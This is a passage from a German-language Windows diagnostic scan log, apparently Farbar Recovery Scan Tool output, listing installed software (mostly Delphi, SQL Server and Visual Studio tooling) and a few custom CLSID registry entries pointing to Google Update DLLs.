DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
DSL-Manager (HKLM-x32\...\{90A455A7-0FC8-4508-B7FA-8F135B8F041A}) (Version: - )
Dump Truck (HKLM-x32\...\Dump Truck) (Version: 1.2.2.933 - Golden Frog, Inc.)
Embarcadero Delphi and C++Builder XE7 Help System (HKLM-x32\...\Embarcadero Delphi and C++Builder XE7 Help System) (Version: 15.0 - Embarcadero Technologies, Inc.)
Embarcadero Delphi and C++Builder XE7 Help System (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
Embarcadero ER/Studio v7.6 Developer Edition (HKLM-x32\...\{D295CDD5-51D6-4ECD-AF51-5896C8576DCD}) (Version: 7.6 - Embarcadero Technologies, Inc.)
Embarcadero InterBase XE3 [instance = developer_ibxe3] (HKLM-x32\...\Embarcadero InterBase XE3 [instance = developer_ibxe3]) (Version: Embarcadero InterBase XE3 - Embarcadero Technologies, Inc.)
Embarcadero RAD Studio XE7 (HKLM-x32\...\Embarcadero RAD Studio XE7) (Version: 15.0 - Embarcadero Technologies, Inc.)
Embarcadero RAD Studio XE7 (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
Erforderliche Komponenten für SSDT (HKLM-x32\...\{3FF082A7-A5DE-4BDA-B56A-1D2BEFD617A3}) (Version: 11.1.3000.0 - Microsoft Corporation)
FastReport 4 Embarcadero edition (HKLM-x32\...\{B97FD67B-98FA-4ed0-8AFF-4723A92E8407}) (Version: Embarcadero Edition - FastReports)
FastReport 5 Embarcadero edition (HKLM-x32\...\{95C1A9DC-EA30-498e-9531-C7C0F889FB92}) (Version: Embarcadero Edition - FastReports)
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
ffdshow x64 v1.3.4515 [2013-06-12] (HKLM\...\ffdshow64_is1) (Version: 1.3.4515.0 - )
FileZilla Client 3.25.2 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\FileZilla Client) (Version: 3.25.2 - Tim Kosse)
Firebird 2.5.2.26540 (x64) (HKLM\...\FBDBServer_2_5_x64_is1) (Version: 2.5.2.26540 - Firebird Project)
Firebird ODBC driver 2.0.2.153 (HKLM\...\Firebird ODBC Driver_is1) (Version: 2.0.2.153 - Firebird Project)
FirebirdClient 3.2.0.0 (HKLM-x32\...\{7D65E5D3-A191-4208-875A-43F149F9C36F}) (Version: 3.2.0.0 - FirebirdSQL)
FreeCommander 2009.02b (HKLM-x32\...\FreeCommander_is1) (Version: 2009.02 - Marek Jasinski)
GExperts for RAD Studio 2009 (HKLM-x32\...\GExpertsRADStudio2009_is1) (Version: 1.37 - GExperts Development Team)
GExperts for RAD Studio XE7 (HKLM-x32\...\GExpertsRADStudioXE7_is1) (Version: 1.37 - GExperts Development Team)
Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
Ghostscript GPL 8.64 (Msi Setup) (x32 Version: 8.64 - Corel Corporation) Hidden
Git version 2.12.2.2 (HKLM\...\Git_is1) (Version: 2.12.2.2 - The Git Development Community)
Google Drive (HKLM-x32\...\{65EACBB4-B0B8-4A5B-AE46-22DBE15C70B5}) (Version: 1.19.8406.6504 - Google, Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.26.9 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
Gpg4win (2.3.1) (HKLM-x32\...\GPG4Win) (Version: 2.3.1 - The Gpg4win Project)
HK-Software IBExpert Personal Edition (HKLM-x32\...\HK-Software IBExpert Personal Edition_is1) (Version: - )
Hotfix für Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947789) (HKLM-x32\...\{8E87B944-4815-3C5E-947F-5035C9F64362}.KB947789) (Version: 1 - Microsoft Corporation)
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HTML Help Workshop (HKLM-x32\...\HTML Help Workshop) (Version: - )
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
InfoPower Grid Essentials for Delphi 2009 (HKLM-x32\...\InfoPower Grid Essentials for Delphi 2009) (Version: - )
Inkscape 0.48.0 (HKLM-x32\...\Inkscape) (Version: 0.48.0 - )
insight3d 0.3.2 (HKLM-x32\...\{BBBA5E54-5B3C-11DE-BAEA-F9C855D89593}) (Version: 0.3.2.0 - insight3d)
InstallAware 7 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\InstallAware 7) (Version: - InstallAware Software Corporation)
InstallAware 7 (x32 Version: 7.9.7201.2008 - InstallAware Software Corporation) Hidden
IsoBuster 2.8 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8 - Smart Projects)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
JOSM 7347 (HKLM-x32\...\OSM) (Version: 7347 - The OpenStreetMap developer community, hxxp://www.openstreetmap.org/)
kuler (x32 Version: 2.0 - Adobe Systems Incorporated) Hidden
madshi's madCollection (HKLM-x32\...\madCollection) (Version: - )
Malwarebytes Version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Manager (x32 Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
MediaInfo 0.7.72 (HKLM\...\MediaInfo) (Version: 0.7.72 - MediaArea.net)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{5CBFF3F3-2D40-34EE-BCA5-A95BC19E400D}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK - DEU Lang Pack (HKLM-x32\...\{98B45D1C-6EB1-460D-A87D-2B60678DC105}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM-x32\...\{1948E039-EC79-4591-951D-9867A8C14C90}) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Access database engine 2010 (German) (HKLM\...\{90140000-00D1-0407-1000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Access database engine 2010 (German) (HKLM-x32\...\{90140000-00D1-0407-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 1.1 Language Pack - DEU (HKLM\...\Microsoft Help Viewer 1.1 Language Pack - DEU) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 2.0 (HKLM-x32\...\Microsoft Help Viewer 2.0) (Version: 2.0.50727 - Microsoft Corporation)
Microsoft Help Viewer 2.0 Language Pack - DEU (HKLM-x32\...\Microsoft Help Viewer 2.0 Language Pack - DEU) (Version: 2.0.50727 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110407-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Report Viewer 2012-Laufzeit (HKLM-x32\...\{F2C6E9F1-8F35-42A0-A9CA-E6C94D92A86C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{5973B12E-5FC1-4EF6-B63B-49C1C4AF2AAA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-Bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework (HKLM\...\{01FB748B-6714-410A-A2FC-B76E1D65FA90}) (Version: 11.1.2820.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework (HKLM-x32\...\{F408C789-83FC-4B7D-A401-7468C8DDBA64}) (Version: 11.1.2820.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{269A8DF6-BBDA-441F-932B-233F9B746D72}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM-x32\...\{EC75BD20-F9CA-4E77-825F-ABD77E95BE91}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (x64) (HKLM\...\{0BF65908-D137-4A9E-B7C9-78F32F74F6FD}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{8E4BA1E5-54E8-41F0-919B-CD875B83CFCE}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 RS-Add-In für SharePoint (HKLM\...\{F6CBC7E5-D953-47B5-866E-F907CAD562B6}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{8CB0713F-CFE0-445D-BCB2-538465860E1A}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service (HKLM\...\{8716ABC5-DFC1-4E3E-816A-F0785CC12295}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{6F173435-3F19-4043-BA3D-A46AA8472859}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 T-SQL-Sprachdienst (HKLM\...\{D4636DD2-A58C-47BC-BBA6-2E1A978A4BA3}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012-Richtlinien (HKLM-x32\...\{1D4E365F-F39C-48BA-A995-CAEDFDA29AD1}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server Data Tools – Database Projects – Web installer entry point (HKLM-x32\...\{18558FE7-A87A-4063-9732-95E9E1420828}) (Version: 10.3.20116.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools - DEU (11.1.21208.0) (HKLM-x32\...\{E2531DEE-F98C-46C4-8DAD-22999172D0C5}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools 2012 (HKLM-x32\...\{4d563512-d8e7-4b16-bec0-b4b14d9925df}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server Data Tools Build Utilities - DEU (11.1.21208.0) (HKLM-x32\...\{8BAD1109-8800-4164-A452-7BE81051A02D}) (Version: 11.1.21208.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{A282A232-780C-45E2-A5E5-9B61D74DCC6E}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version: - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Integrated) - DEU (HKLM-x32\...\{B28DC16A-5394-3761-B143-450AE92516BB}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - DEU (HKLM-x32\...\{987AE03F-234A-3623-BD28-6B31FD1D3AB3}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Integrated) (HKLM-x32\...\{55b160d2-8221-45fd-ab30-4388c69c0f3b}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Integriert) Language Pack - DEU (HKLM-x32\...\{7f73f356-2292-428a-9f1b-7c13f63c7980}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Isolated) (HKLM-x32\...\{d2e0df0f-bf0a-4a89-9530-ebf93842c393}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Isoliert) Language Pack - DEU (HKLM-x32\...\{83fb5592-bb11-4948-b595-ae8bbeb7a570}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Language Pack - DEU (HKLM-x32\...\{8E87B944-4815-3C5E-947F-5035C9F64362}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime Language Pack - DEU (HKLM-x32\...\{76DAEC83-AF7B-333C-8A53-83D7C7D39199}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications Design-Time 3.0 - DEU Language Pack (HKLM-x32\...\{38F74A0E-357B-336C-B614-FE59F4BC62A0}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications Design-Time 3.0 (HKLM-x32\...\{5A03C202-08B4-3F1D-9A60-A4F53EF1B636}) (Version: 10.0.40220 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications x86 Runtime 3.0 - DEU Language Pack (HKLM-x32\...\{96D7B7B6-424F-3A52-8E8D-32CF2615DBD2}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications x86 Runtime 3.0 (HKLM-x32\...\{191A6F65-6878-398D-A272-EF011B80F371}) (Version: 10.0.40220 - Microsoft Corporation)
Microsoft VSS Writer für SQL Server 2012 (HKLM\...\{7647B46D-D4E6-43A5-AC9D-0BAA28C63271}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2012 (HKLM-x32\...\{042CA540-1646-4C8B-AA91-A57CCEB6D928}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2012 (x64) (HKLM\...\{3E123CBC-07C3-448E-ACE4-F04157099175}) (Version: 11.1.3000.0 - Microsoft Corporation)
Mimo (HKLM-x32\...\Mimo) (Version: 0.2.5 - Mimo, Inc.)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.8.0.6273 - Mozilla)
Mozilla Thunderbird 45.8.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 45.8.0 (x86 de)) (Version: 45.8.0 - Mozilla)
MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project)
MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{EBFC96E5-4409-426E-88B7-650ADB342E78}) (Version: 8.0.50727.42 - The Firebird Project)
MultiPar Version 1.2.7.6 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\{AAFC96BF-C615-4D77-9A55-C692A7B26FC5}_is1) (Version: 1.2.7.6 - Yutaka Sawada)
NVIDIA 3D Vision Controller-Treiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 320.49 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.49 - NVIDIA Corporation)
NVIDIA GeForce Experience 1.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 1.5 - NVIDIA Corporation)
NVIDIA Grafiktreiber 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.49 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.13.0604 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0604 - NVIDIA Corporation)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
OpenOffice 4.1.3 Language Pack (German) (HKLM-x32\...\{F656568B-DF59-4EA8-997F-4E293ABC0ABF}) (Version: 4.13.9783 - Apache Software Foundation)
Opera Stable 44.0.2510.1449 (HKLM-x32\...\Opera 44.0.2510.1449) (Version: 44.0.2510.1449 - Opera Software)
Oracle VM VirtualBox 5.1.18 (HKLM\...\{833806DB-0F3D-466E-8353-07283FFBC957}) (Version: 5.1.18 - Oracle Corporation)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.0 - pdfforge GmbH)
Photoshop Camera Raw (x32 Version: 5.0 - Adobe Systems Incorporated) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.5.7.2450 - Jan Fiala)
Rave Reports 10.0.0 BE (HKLM-x32\...\Rave Reports 10.0.0 BE_is1) (Version: - Nevrona Designs)
Rave Reports 7.6.0 BE (HKLM-x32\...\Rave Reports 7.6.0 BE_is1) (Version: - Nevrona Designs)
Rave Reports 7.6.2 BE (HKLM-x32\...\Rave Reports 7.6.2 BE_is1) (Version: - Nevrona Designs)
Report Manager 2.9b (HKLM-x32\...\Report Manager_is1) (Version: 2.9b - Toni Martir)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
SDL Comp. Suite 9.7/LE for RadStudio 6.0 (HKLM-x32\...\SDL Comp. Suite 9.7/LE for RadStudio 6.0) (Version: - )
SeaMonkey 2.46 (x86 de) (HKLM-x32\...\SeaMonkey 2.46 (x86 de)) (Version: 2.46 - Mozilla)
Smart Organizing Monitor for SP 210 Series (HKLM-x32\...\{D1EC71F7-E534-4A54-A75A-DCDCCAD77BF7}) (Version: 1.00 - RICOH)
SmartBear AQtime 7 Standard for Embarcadero RAD Studio XE and XE2 (HKLM-x32\...\InstallShield_{DC73000A-9FD8-4445-A578-C52209A90522}) (Version: 7.30.535.861 - SmartBear Software)
SmartBear AQtime 7 Standard for Embarcadero RAD Studio XE and XE2 (x32 Version: 7.30.535.861 - SmartBear Software) Hidden
SmartWebPrinting (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sonic Foundry Sound Forge 5.0 (HKLM-x32\...\{F3D6581A-FEA1-11D4-8170-00C04F612EA4}) (Version: 5.0.0.117 - Sonic Foundry)
SPCA1528 PC Driver (HKLM-x32\...\{570C2A84-A145-4DF0-AE9D-012584DF09DC}) (Version: 2.2.2.0 - sunplus)
SQL Server 2012 Analysis Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 BI Development Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Client Tools (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Data quality client (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Data quality service (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Distributed Replay (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Documentation Components (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Full text search (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Integration Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Master Data Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Reporting Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 RS_SharePoint_SharedService (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 SQL Data Quality Common (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server-Browser für SQL Server 2012 (HKLM-x32\...\{1A4C9497-7D4B-466D-8D3A-FE0D925386DC}) (Version: 11.0.2100.60 - Microsoft Corporation)
SQL-Profiler 4.0.0 (HKLM\...\SQL-Profiler 4.0.0-2) (Version: 4.0.0-2 - EnterpriseDB)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Suite Shared Configuration CS4 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
TeeChart Standard 8 for Delphi 2009 (HKLM-x32\...\TeeChart Standard 8 for Delphi 2009) (Version: Version 8 - Steema Software SL)
Telescope Driver (HKLM-x32\...\{A59AB961-BE82-41E0-B0FB-648DFA6DDEA4}) (Version: 1.0.20 - ANC)
TMS Cloud Pack for RAD Studio XE7 v3.0.0.0 (HKLM-x32\...\TMS Cloud Pack for RAD Studio XE7_is1) (Version: 3.0.0.0 - tmssoftware.com)
TMS FMX UI Pack for RAD Studio XE7 v3.5.3.0 (HKLM-x32\...\TMS FMX UI Pack for RAD Studio XE7_is1) (Version: 3.5.3.0 - tmssoftware.com)
TMS VCL WebOSMaps for RAD Studio XE7 v2.0.2.0 (HKLM-x32\...\TMS VCL WebOSMaps for RAD Studio XE7_is1) (Version: 2.0.2.0 - tmssoftware.com)
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TortoiseGit 1.8.6.0 (64 bit) (HKLM\...\{EC93BB38-01C9-4D3B-9BA7-B26BDC03E6C1}) (Version: 1.8.6.0 - TortoiseGit)
TortoiseSVN 1.8.4.24972 (64 bit) (HKLM\...\{A2EFDE01-96B3-4E55-8834-81617ED6BCBE}) (Version: 1.8.24972 - TortoiseSVN)
TotalCADConverter (HKLM-x32\...\Total CAD Converter_is1) (Version: - Softplicity, Inc.)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
TRichView Trial for Delphi version 16.0.1 (HKLM-x32\...\TRichViewTrialDelphi_is1) (Version: 16.0.1 - Sergei Vladimirovich Tkachenko IP)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unterstützungsdateien für Microsoft SQL Server 2008-Setup (HKLM\...\{6AF73222-EE90-434C-AE7E-B96F70A68D89}) (Version: 10.1.2731.0 - Microsoft Corporation)
Update 4.0.2 für Microsoft .NET Framework 4 Client Profile DEU Language Pack (KB2544514) (HKLM-x32\...\{0E3DAF3D-FF69-345A-A99E-1FED304CA083}.KB2544514) (Version: 1 - Microsoft Corporation)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{53952792-BF16-300E-ADF2-E7E4367E00CF}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VyprVPN (HKLM-x32\...\{526B3DDC-6891-4F43-8F64-8B83DC9E4848}) (Version: 2.9.6.7227 - Golden Frog, GmbH.)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
wPDF V4.30 (HKLM-x32\...\wPDF_is1) (Version: - WPCubed GmbH)
WPTools 7.28 Standard (HKLM-x32\...\WPTools7_is1) (Version: 7 - WPCubed GmbH, Germany)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{60DB653C-0B48-9A42-AF50-4688BDB82D58}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation)
